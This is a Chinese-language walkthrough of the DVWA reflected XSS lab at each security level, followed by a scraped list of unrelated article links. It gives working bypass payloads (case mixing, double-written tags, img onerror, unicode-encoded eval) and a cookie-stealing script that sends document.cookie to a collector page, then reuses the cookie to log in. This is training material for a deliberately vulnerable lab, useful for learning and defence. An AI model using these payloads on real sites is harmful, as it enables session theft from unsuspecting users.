一)XSS(Reflected)介绍:

反射型xss(非持久型):需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面。特点:弹窗警告、广告;javascript;在浏览器中执行。

通过Web站点漏洞,向客户交付恶意脚本代码,实现对客户端的攻击;恶意攻击者往Web页面里插入恶意的 Script 代码,当用户浏览该页面时,嵌入其中 Web 里面的 Script 代码就会被执行,从而达到恶意攻击用户的目的;注入客户端脚本代码、盗取cookie、重定向等。

二)实际中实现流程:

1)攻击者向服务器端注入一段js代码
2)服务器端响应攻击者一个带有js代码的页面
3)攻击者向普通用户发送带有js代码的页面,诱使用户点击页面
4)用户点击攻击者所发送的页面,页面自动运行js代码,获取用户cookie,并发送给攻击者

三)实际操作:
正常输入一个用户名:

DVWA——XSS(Reflected)——low

核心源码:<?php
header ("X-XSS-Protection: 0");
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {// Feedback for end userecho '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
}
?>
源码解析:1)array_key_exists检查数组中是否有指定的键名
2)X-XSS-Protection: 1强制XSS保护(如果XSS保护被用户禁用,则有用)0禁用XSS保护

可以看到,low级别的代码只是判断了name参数是否为空,如果不为空的话就直接打印出来,并没有对name参数做任何的过滤和检查,没用进行任何的对XSS攻击的防御措施,存在非常明显的XSS漏洞,用户输入什么都会被执行。

方法一:

输入 <script>alert('hack')</script> 的结果:


此时通过 右键——查看网页源代码 可以在网页前端代码发现刚刚输入的JS代码已经被写入了:

方法二:

1)用alert进行弹窗测试验证是否存在XSS:

<script>alert('hack')</script>


结论:成功弹窗,说明存在XSS漏洞并且可利用。

2)利用XSS获取cookie
编写一个cookie.php文档用于获取页面的cookie,放置在一个指定的目录下(可以尝试放在网站的根目录之外的路径下看是否有效)文档内容如下:

<?php$cookie = $_GET[“cookie”];file_put_contents(“cookie.txt”,$cookie);?>

接着编写 js 代码(意思就是利用本地的cookie.php这个文件获取cookie,要注意本地的地址要写对。)将页面的cookie发送到cookie.php中

1<script>document.location="http://localhost/dvwa/cookie.php?cookie="+document.cookie;</script>
注:前面我们只是利用<script>alert('hack')</script>其实现一个简单的弹窗并没有进一步加以利用,此处我们构造一句JS去获取目标的cookie,

因为要将构造的要对上面的编写的JS代码进行URL转码:

http://localhost/dvwa/vulnerabilities/xss_r/?name=%3Cscript%3Edocument.location%3D%E2%80%9Dhttp%3A%2F%2Flocalhost%2Fdvwa%2Fcookie.php%3Fcookie%3D%E2%80%9D%2Bdocument.cookie%3B%3C%2Fscript%3E#解析:1)http://localhost/dvwa/vulnerabilities/xss_r/?name=——是我们自己搭建的网站(dvwa)的XSS(Reflected)的路径。2)%3Cscript%3Edocument.location%3D%E2%80%9Dhttp%3A%2F%2Flocalhost%2Fdvwa%2Fcookie.php%3Fcookie%3D%E2%80%9D%2Bdocument.cookie%3B%3C%2Fscript%3E#——是我们构造的JS代码(原本输入于id框中<script>alert('hack')</script>变成了<script>document.location="http://localhost/dvwa/cookie.php?cookie="+document.cookie;</script>并进行了url编码)。

在实际中会将此url变换成短链接并放置到公网(或目标服务器)中,等待目标用户点击此链接,一旦目标用户点击,那么攻击者就可以获取他的cookie并将cookie保存到攻击者服务器指定路径下的cookie.txt中。

在自己搭建的环境中可以直接将整个编码后的url复制粘贴到地址栏进行访问,也可以将编码后的JS代码(url的后半段)在框中输入。最终页面跳转,说明js代码执行成功:

此时,当我们到phpstudy中的www目录下就会发现成功生成了一个cookie.txt文档:

3)利用获取到的cookie登陆DVWA
在浏览器中访问DVWA的登陆页面,然后F12搜索cookie关键字并将cookie值修改为获取到的cookie值:

访问登陆页面:

修改cookie值:

功地利用cookie登陆了DVWA并获取了登陆身份:

DVWA——XSS(Reflected)——medium

<?php
header ("X-XSS-Protection: 0")
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {// Get input$name = str_replace( '<script>', '', $_GET[ 'name' ] );// Feedback for end userecho "<pre>Hello ${name}</pre>";
}
?>

<pre> </pre> 元素可定义预格式化的文本。被包围在 pre 元素中的文本通常会保留空格和换行符。而文本也会呈现为等宽字体。

可以看到,medium级别的代码只是在low级别上增加了对于<scripit>的过滤,把 <script>替换为空,然而并没有什么用,我们可以直接采用以下几种方式绕过。

方法一:(大小写绕过)

<sCript>alert('hack')</scRIpt>
<SCRIPT>alert('hack')</SCRIPT>

输入 <SCRIPT>alert('hack')</SCRIPT> 结果:

此时通过 右键——查看网页源代码 可以在网页前端代码发现刚刚输入的JS代码已经被写入了:

方法二:(双写绕过)

<scr<script>ipt>alert("hack")</script>
<s<script>cript>alert("hack")</script>

如果任然直接输入 <script>alert('hack')</script> 会发现alert语句没有被执行,因为<script>不再被当成标签而被过滤了:

查看一下源代码:

可以看到<script>标签已经被替换为空,但其余内容并没有改变,我们可以利用双写绕过方法,也就是把<script>标签过滤后,剩下的内容仍能组成完整的XSS语句:

此时再次查看源代码:

方法三:(使用非<script>标签的其他标签)

1<img src=1 onerror='alert("hack")'>
23

语句解析:只要src的值(图片)找不到就一定会发生错误,那么onerror的代码得到了执行:

方法四:(关键字编码)

有些时候服务器会对代码中关键字进行过滤(如alert),我们可以尝试将关键字进行unicode编码(但是直接把编码后的语句输入是不会起作用的),再将编码后的放在eval()会将编码后的语句解码后再执行:

将alert(“D-Rose”)进行unicode编码:

 \u0061\u006c\u0065\u0072\u0074("D-Rose")

构建出来的语句如下:

<Script>eval(\u0061\u006c\u0065\u0072\u0074("D-Rose") )</scripT>

成功弹窗:

DVWA——XSS(Reflected)——high

核心源码:<?php
header ("X-XSS-Protection: 0");
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {// Get input$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );// Feedback for end userecho "<pre>Hello ${name}</pre>";
}
?>

可以看到,high级别的代码使用了正则表达式直接把 <*s*c*r*i*p*t 给过滤了,* 代表一个或多个任意字符,i 代表不区分大小写。所以<script>标签在这里就不能用了,但可以通过img、body等标签的事件或者iframe等标签的src注入恶意的js代码。

在high等级中继续使用 <script>alert(/xss/)</script> 测试是否有XSS漏洞,会发现只显示 > 前面所有字符被过滤:


同时尝试使用medium等级中的大小写绕过、双写绕过,发现还是所有字符都被过滤。既然在high等级中<script>标签被彻底过滤,那么我们使用非<script>标签 img、body等标签的事件或者 iframe等标签 的src注入恶意js代码。

方法一:
输入 <img src=1 οnerrοr=alert('hack')> 结果:

<img src=1 οnerrοr=alert('hack')>的意思是,当图片显示错误时,执行 alert(‘hack’) ,这里我们构造的的 src=1 肯定显示错误,所以执行 alert语句。


此时通过 右键——查看网页源代码 可以在网页前端代码发现刚刚输入的JS代码已经被写入了:

DVWA——XSS(Reflected)——impossible

核心源码:<?php
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {// Check Anti-CSRF tokencheckToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );// Get input$name = htmlspecialchars( $_GET[ 'name' ] );// Feedback for end userecho "<pre>Hello ${name}</pre>";
}
// Generate Anti-CSRF token
generateSessionToken();
?>
源码分析:
htmlspecialchars(string): 把预定义的字符:"<" (小于)、 ">" (大于)、&''"" 转换为HTML实体,防止浏览器将其作为HTML元素

可以看出,impossible级别的代码先判断name是否为空,不为空的话然后验证其token,来防范CSRF攻击。然后再用htmlspecialchars函数将name中的预定义字符 “<” (小于)和 “>” (大于)转换成html实体,这样就防止了我们填入标签。

当我们输入 <script>alert('hack')</script> 时,因为 htmlspecialchars 函数会将 < 和 > 转换成html实体,并且${name}取的是$name的值,然后包围在<pre></pre>标签中被打印出来,所以我们插入的语句并不会被执行:

查看源代码,表单提交的过程中,把我们的user_token也一并提交了,来和服务器端的session_token做验证,防止CSRF攻击。我们输入的代码,直接被当成html文本给打印出来了,并不会被当成js脚本执行.

此时通过 右键——查看网页源代码 可以在网页前端代码发现刚刚输入的JS代码并没有成功的写入。

四)参考文献:

DVWA–反射型XSS(Reflected)攻略详解

DVWA——XSS(Reflected)——多种方法实现+详细步骤图解+获取cookie的利用过程演示相关推荐

  1. HTML用乘法函数,Excel乘法函数的使用方法和详细步骤

    Excel是一款非常强大的办公软件,其应用非常广泛.我们在日常工作中经常都要用到Excel,使用Excel进行处理大型数据的表格,要在数据上计算就会使用到数据上相乘,这时候我们就需要使用乘法的函数,那 ...

  2. Windows Server 2003 AD升级到Windows Server 2008 AD的方法及详细步骤

    前言: Windows Server 2008 是现在企业比较流行的服务器操作系统,安全性高,配置灵活.方便,集成了Hyper-V虚拟化功能,能够充分发挥硬件的性能.Windows Server 20 ...

  3. 贴花纸怎么贴_木纹纸怎么贴? 贴木纹纸的方法与详细步骤

    木纹纸是很常见的装饰纸,很多家具等的表面都是使用的木纹纸进行装饰,那木纹纸怎么贴呢?我们来了解下贴木纹纸的方法与详细步骤,贴木纹纸的防皱技巧: 木纹纸是什么? 木纹纸质是一种表皮装饰纸,其原材料一般是 ...

  4. 在3dmax软件中添加样条的方法和详细步骤

    在3dmax软件中添加样条的方法和详细步骤! 在3dmax软件中添加样条的方法和详细步骤!三dsMax是一款三建模.动画和渲染软件.借助3dsMax,可以创造一个宏伟的游戏世界,布彩的场景,实现设计可 ...

  5. 网络和计算机加密驱动,Win7电脑驱动器怎么加密?Win7系统给驱动器加密的方法和详细步骤...

    win7电脑驱动器怎么加密?电脑的安全问题是很多的小伙伴都是比较关心的,对于电脑中的驱动器的不能让别人随便就修改是有小伙伴在网络提问的问题,怎么保护电脑的数据的安全硬件的安全的设置驱动器加密的方法是什 ...

  6. 排序算法 快速排序【详细步骤图解】

    排序算法 快速排序[详细步骤图解] 快速排序 主要思想 图解 第一轮分割序列 第二轮分割序列 --- 左子序列 小结 第三轮分割序列 --- 右子序列 C++实现 总结 快速排序 给定一个序列:22 ...

  7. mysql安装详细步骤图解:

    Mysql安装详细步骤图解: 分享是一种美(Sharing is a beauty) [本文转自http://blog.csdn.net/fanyunlei/article/details/21454 ...

  8. mysql安装详细步骤图解

    mysql安装详细步骤图解 本文转自http://blog.csdn.net/fanyunlei/article/details/21454645 别看图多,其实mysql的安装十分简单,一路next ...

  9. PHP代码审计DVWA[XSS (Reflected)]

    XSS (Reflected)反射型XSS 靶场搭建可用蓝易云服务器

最新文章

  1. hibernate mysql longblob_使用hibernate 插入mysql blob 字段 最大能插入多大的数据
  2. 树结构遍历节点名字提取,这里提取的是el-tree数据结构,封装成函数
  3. 【Linux部署】Linux环境 .rar 格式文件处理工具安装使用(一波两折避坑指北)
  4. tiny4412--linux驱动学习(2)
  5. 创建外部快照_快照事件:现在如何仅通过拍照即可创建日历事件
  6. 程序员一定要知道的11个实用工具网站
  7. 微课|中学生可以这样学Python(例8.22):冒泡法排序
  8. 详解Bootstrap列表组组件
  9. Annotation-specified bean name ‘mapper‘ for bean class [com.thoughtworks.xstream.mapper.Mapper] conf
  10. 创建数据库以及该数据库下的表单
  11. 【游戏开发实战】教你在Unity中实现笼中窥梦的效果(RenderTexture | 视觉差| 多相机 | 渲染 | shader | 多场景)
  12. 服务器外链图片不显示,nginx服务器设置图片防盗链,禁止图片外链
  13. 【NOIP2014提高组】石头剪子布
  14. 基于树莓派语音合成小白避坑
  15. 哪个牌子的蓝牙耳机音质好?公认音质最好的真无线耳机推荐
  16. ARP欺骗之——原理分析
  17. 多CPU ,多核和进程以及多线程之间的关系
  18. 《道德经》程序员版第六章
  19. autosar中com模块_AUTOSAR架构的CAN通讯
  20. 酷炫android壁纸,安卓极致酷炫桌面ADW 附带12款个性主题

热门文章

  1. js 中从JSON中取出某个属性的值
  2. 微信群管理工具哪个好?最安全的微信群管理工具推荐!
  3. 专升本——主从复合句
  4. ZIGBEE学习之---ZSTACK1.4.3修改密钥(CC2430)
  5. 禁止from disk cache
  6. 中国消费信贷行业市场供需与战略研究报告
  7. python利用近似公式计算π_python如何利用公式计算π
  8. Python3 queue队列类
  9. 复旦计算机学硕上岸,复旦大学工程与应用技术研究院电子信息2020年考研上岸前辈经验指导...
  10. 5G标准必要专利最新全球排名